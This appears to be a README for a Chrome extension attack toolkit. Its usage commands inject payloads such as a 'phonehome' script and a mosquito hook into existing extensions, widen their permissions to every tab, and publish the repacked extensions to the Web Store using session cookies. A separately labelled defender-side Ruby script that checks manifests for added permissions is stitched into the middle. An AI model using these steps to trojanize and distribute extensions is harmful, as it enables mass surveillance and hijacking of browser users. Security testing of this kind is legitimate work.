Krzysztof Kotowicz
Krzysztof Kotowicz added payloads
Latest commit 3947bac Mar 22, 2014

Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.


  • Krzysztof Kotowicz - @kkotowicz - blog
  • Michele '@antisnatchor' Orru


A set of scripts for injecting new code into existing extensions. Extensions can be downloaded from the Chrome Web Store (repacker-webstore) or taken from CRX files (repacker-crx).


  • bash
  • ruby
  • zip (cmd line)
  • curl (cmd line)
  • Google Chrome (used in crx mode only)


# get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
$ injector/ clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js

# Same, but pack into instead
$ injector/ clcbnchcgjcjphmnpndoelbdhakdlfkk zip payloads/phonehome.js

# Create new CRX with Google Chrome
$ injector/ clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js

# Inject into existing CRX file
$ injector/ original.crx crx repacked.crx payloads/phonehome.js

# Add some permissions into manifest.json
$ injector/ original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"

# Add persistent content script file launching on every tab
$ echo 'console.log(location.href)' > cs.js
$ injector/ original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js

For example, mass poisoning every tab with mosquito:

# start mosquito server:
$ cd path/to/mosquito 
$ python mosquito/ 8082 4444 --http 8000

# generate mosquito hook:
# - visit http://localhost:8000/generate
# - save hook as cs.js

# inject mosquito dropper into extension:
$ injector/ original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js
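
A defender-side check for the manifest changes the commands above produce, added here as an example and not part of this project's code: it diffs a trusted manifest.json against a candidate copy and flags added permissions, content scripts and background scripts. The manifest keys are standard Manifest V2 fields; the sample manifests and the file name `extra.js` are constructed, and that an added payload shows up as an extra background script is an assumption.

```ruby
require 'json'

# Permissions and match patterns that reach every tab or all traffic.
BROAD = ['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*', 'tabs', 'proxy'].freeze

# Constructed sample: manifest of the extension as originally published.
TRUSTED_MANIFEST = <<~JSON
  {"name": "Example", "version": "1.0", "manifest_version": 2,
   "permissions": ["storage"],
   "background": {"scripts": ["bg.js"]}}
JSON

# Constructed sample: same extension after extra code and permissions were added.
# Assumption: the added payload shows up as an extra background script.
REPACKED_MANIFEST = <<~JSON
  {"name": "Example", "version": "1.0", "manifest_version": 2,
   "permissions": ["storage", "tabs", "<all_urls>"],
   "background": {"scripts": ["bg.js", "extra.js"]},
   "content_scripts": [{"matches": ["<all_urls>"], "js": ["cs.js"]}]}
JSON

# [script, match pattern] pairs declared under content_scripts.
def content_script_pairs(manifest)
  Array(manifest['content_scripts']).flat_map do |cs|
    Array(cs['js']).product(Array(cs['matches']))
  end
end

# Scripts listed under background.scripts (empty if the key is absent).
def background_scripts(manifest)
  bg = manifest['background']
  bg.is_a?(Hash) ? Array(bg['scripts']) : []
end

# Report what the candidate manifest gained relative to the trusted one.
def manifest_drift(trusted_json, candidate_json)
  base = JSON.parse(trusted_json)
  cand = JSON.parse(candidate_json)
  added_perms = Array(cand['permissions']) - Array(base['permissions'])
  added_cs = content_script_pairs(cand) - content_script_pairs(base)
  added_bg = background_scripts(cand) - background_scripts(base)
  broad_cs = added_cs.select { |_js, match| BROAD.include?(match) }
  { added_permissions: added_perms,
    added_content_scripts: added_cs,
    added_background_scripts: added_bg,
    suspicious: !(added_perms & BROAD).empty? || !broad_cs.empty? || !added_bg.empty? }
end

puts JSON.pretty_generate(manifest_drift(TRUSTED_MANIFEST, REPACKED_MANIFEST)) if __FILE__ == $PROGRAM_NAME
```

The trusted manifest should come from a known-good copy of the same extension ID and version, so that legitimate updates are not reported as drift.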

Webstore Uploader

Script for uploading and publishing Chrome Extensions packed in zip files to the Chrome Web Store.


  • ruby


# Preparation:

1. Create a Chrome developer account
2. Log in at
3. Pay your $5 one-time fee (credit card needed)
4. Get the SID, SSID and HSID cookies and paste their values into the webstore_uploader/config.rb file

# Get Chrome extension code
#  e.g. run Injector in zip mode:

$ injector/ clcbnchcgjcjphmnpndoelbdhakdlfkk zip payloads/phonehome.js

# (optional) - prepare screenshot / description file

# publish the extension right away
$ ruby webstore_uploader/webstore_upload.rb publish description.txt screenshot.png

# or just upload & save it:
$ ruby webstore_uploader/webstore_upload.rb save description.txt screenshot.png

# you can access the extension from your developer dashboard